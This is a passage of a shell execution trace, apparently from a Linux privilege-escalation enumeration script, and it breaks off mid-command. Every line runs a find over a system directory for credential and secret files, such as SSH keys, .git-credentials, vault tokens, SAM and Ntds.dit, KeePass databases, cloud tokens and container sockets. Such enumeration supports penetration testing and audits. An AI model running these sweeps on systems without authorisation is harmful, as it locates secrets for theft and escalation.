+ FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"bind\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \"kube-proxy\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"kubelet\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"bind\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_BIN=`eval_bckgrd "find /bin -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_CACHE=`eval_bckgrd "find /.cache -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_CDROM=`eval_bckgrd "find /cdrom -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_ETC=`eval_bckgrd "find /etc -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"exports\" -o -name \"wp-config.php\" -o -name \"*knockd*\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" 